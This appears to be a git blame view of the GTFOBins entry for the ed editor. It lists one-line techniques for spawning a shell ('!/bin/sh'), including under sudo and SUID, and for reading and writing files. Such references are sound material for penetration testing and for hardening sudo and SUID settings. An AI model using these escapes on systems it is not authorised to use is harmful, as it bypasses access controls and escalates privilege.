1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-21 03:11:42 +02:00
GTFOBins.github.io/_gtfobins/ed.md

22 lines
311 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-07-16 15:01:50 +02:00
- code: |
ed
!/bin/sh
2018-07-04 20:26:52 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
ed file_to_write
w
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: ed file_to_read
2018-05-21 21:14:41 +02:00
sudo-enabled:
2018-07-16 15:01:50 +02:00
- code: |
sudo ed
!/bin/sh
2018-05-21 21:14:41 +02:00
suid-limited:
2018-07-16 15:01:50 +02:00
- code: |
./ed
!/bin/sh
---